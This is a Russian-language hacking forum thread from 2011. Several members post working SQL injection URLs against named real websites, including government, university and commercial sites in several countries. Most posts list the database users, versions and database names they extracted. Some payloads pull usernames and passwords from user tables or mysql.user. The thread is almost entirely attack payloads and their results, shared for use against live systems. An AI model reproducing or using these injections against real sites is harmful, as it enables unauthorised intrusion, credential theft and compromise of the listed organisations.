HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14181  
Старый 13.08.2011, 19:49
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от None  
http://www.apca.org.ug/index.php?ty=page&i=107+or%281,2%29=%28select+coun t%28*%29,concat%28%28++select+concat%28user(),0x3a ,version(),0x3a,database(),0x3a,username,0x3a,pass word%29+from+users+limit+0,1%29,0x3a,floor%28rand% 28%29*2%29%29+from+information_schema.columns+grou p+by+2+limit+0,1%29--
apcadbadmin1@localhost:5.1.44:apca_org_ug

Цитата:
Сообщение от None  
http://www.bwinditrust.ug/content.php?content_id=8&sub_id=7 or(1,2)=(select count(*),concat(( select concat(user(),0x3a,version(),0x3a,database(),0x3a, uname,0x3a,passwd,0x3a,level,0x3a,status) from authuser limit 0,1),0x3a,floor(rand()*2)) from authuser group by 2 limit 0,1)
bwindidbadmin@localhost:5.1.44:bwinditrust_ug

Цитата:
Сообщение от None  
http://www.naro.go.ug/Inventory/naro/display_search_results.php
POST
institution_type=-3+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,us er(),database(),version()),11--&Button2=+++SEARCH++++
narodbadmin@localhost:naro_go_ug:5.1.44
 
Ответить с цитированием

  #14182  
Старый 14.08.2011, 11:21
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию

Bio[GOOGLE]rede.pt PR - 4

Эксплойт

Цитата:
Сообщение от None  
http://www.bio[GOOGLE]rede.pt/page.asp?id=2 or 2=(SQLI)--
Имя Пользователя: webbiorede

База Данных: Biorede

Платформа: Microsoft SQL Server 2008 (SP1) - 10.0.2775.0 (X64) Apr 30 2010 14:31:04 Copyright (c) 988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2)

Другие БД на сервере:

Цитата:
Сообщение от None  
master
tempdb
model
msdb
jazzportugal
...
------------------------------------------------------------------------

Jazzportugal.ua.pt PR - 5

Эксплойт

Цитата:
Сообщение от None  
http://www.jazzportugal.ua.pt/web/musicos.asp?l=1 or 1=(SQLI)
Имя Пользователя: webjazz

База Данных: jazzportugal

Все остальное одно и то же так как эти две БД хранятся на одном сервере, но доступа у них друг к другу нет..
 
Ответить с цитированием

  #14183  
Старый 14.08.2011, 18:06
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Еще один ср**й хостинг

http://www.webconexion.net/documentation/comment.php?article_id=007+or+1+group+by+concat%28 %28select%20host+from+mysql.user+WHERE+User=0x726F 6F74%29,floor%28rand%280%29*2%29%29%20having%20min %280%29--+&action=new
 
Ответить с цитированием

  #14184  
Старый 15.08.2011, 00:36
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Музыкальный портал с трафом ~90к уников

Инъекция в MySQL 5.1.51

Код:
Code:
http://www.bis[туц-туц]ound.com/index.php?name=Topics&op=view&id=-70380+union+select+1,2,3,user_password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+slaed_users+where+user_name=%22admin%22
 
Ответить с цитированием

  #14185  
Старый 16.08.2011, 11:05
netruxa
Новичок
Регистрация: 21.04.2008
Сообщений: 1
Провел на форуме:
10077

Репутация: 0
По умолчанию

По запросу в Яндексе "куплю мебель" на первом месте

http://www.bymebel.ru/salon.php?idf=aaa%27+union+select+NULL,NULL,versio n%28%29,database%28%29,user%28%29,NULL,NULL,NULL,N ULL,NULL,1,2,3,4,5,6,7,8,9,20,1+--+

udb2653

4.0.26-log

Uwww2653S@localhost
 
Ответить с цитированием

  #14186  
Старый 16.08.2011, 11:59
eclipse
Guest
Сообщений: n/a
Провел на форуме:
30555

Репутация: 85
По умолчанию

Blind SQL Inj ---PR 5

Цитата:
Сообщение от None  
http://dsor.upb.de/index.php?id=65&empid=-1'+and+substring(@version(),1,1)=5--+
Тип БД:MySQL 5

Имя БД: typo3db

Имя пользователя: dsor@dsor.upb.de

----------------------------------------------------------------------

SQL Inj---PR 5

Цитата:
Сообщение от None  
http://www.startingoutguide.org.uk/employers/28?empid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,,17,18,19,20,21,22,23,24,25,26,27--+
Тип БД: MySQL 5.0.45

Имя БД: sog2010

Имя пользователя: starting@startingoutguide.org.uk

----------------------------------------------------------------------

SQL Inj---PR 6

Цитата:
Сообщение от None  
http://www.dbm.state.md.us/phonebook/IndDetails.asp?EmpID=1%20or%201=@@version
Тип БД:Microsoft SQL Server 2005
 
Ответить с цитированием

  #14187  
Старый 17.08.2011, 00:18
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию

Код:
Code:
http://www.autoland.com.ua/article.php?id=-19+union+select+concat_ws(0x3a,user(),version(),database()),2+--+
User: autoland_xxx@localhost

Version: 5.0.51a-community

Database: autoland_xxx

PR 4

тИЦ 30


Код:
Code:
http://www.addinol.de/oilfinder/oil_details.php?id=658 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
User: berezovski@localhost

Version: 5.0.26

Database: oilfinder1

PR 4

тИЦ 30


Код:
Code:
http://www.cdr-forum.de/showdvdanbieter.php?ID=-105+union+select+1,concat_ws(0x3a,user(),version(),database())+--+
User: p33794567@localhost

Version: 4.0.27-standard

Database: db67865067

PR 4

тИЦ 10
 
Ответить с цитированием

  #14188  
Старый 17.08.2011, 01:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

Министерство земельных и имущественных отношений...

Код:
Code:
http://mio.bashkortostan.ru/index.php?page=Information&id=1152+union+Select+1,user+from+mysql.user --
version: 4.0.24_Debian-10-log

database: mio

user: root@localhost

PR: 5 / тИЦ: 50
 
Ответить с цитированием

  #14189  
Старый 17.08.2011, 14:57
COOLBOY007
Новичок
Регистрация: 09.06.2009
Сообщений: 9
Провел на форуме:
72074

Репутация: 0
Отправить сообщение для COOLBOY007 с помощью ICQ
По умолчанию

Код:
Code:
http://www.no2id.net/news/newsletters/newsletter.php?issue=118 and 1=1
[blind]

User: no2id@localhost

Version: 4.0.24_Debian-10sarge3-log

Database: no2id

PR 6

тИЦ 20


Код:
Code:
http://www.balh.co.uk/eventsbooking_form.php?id=77 and 1=1
[blind]

User: dbo137413126@212.227.109.52

Version: 4.0.27-max-log

Database: db137413126

PR 5

тИЦ 10


Код:
Code:
http://www.historytoherstory.org.uk/subject.php?id=287 and 1=1
[blind]

User: highplace@localhost

Version: 3.23.56

Database: highplacedb

PR 5

тИЦ 10


Код:
Code:
http://www.simshare.org.uk/project.php?id=85%20and%201=1
[blind]

User: ukcle_dbadmin@localhost

Version: 5.1.52

Database: ukcle_oer

PR 4
 
Ответить с цитированием

  #14190  
Старый 18.08.2011, 01:58
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Срослось

http://www.discovery.org/scripts/viewDB/index.php?command=view&printerFriendly=true&id=-1783+union+select+user%28%29,2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ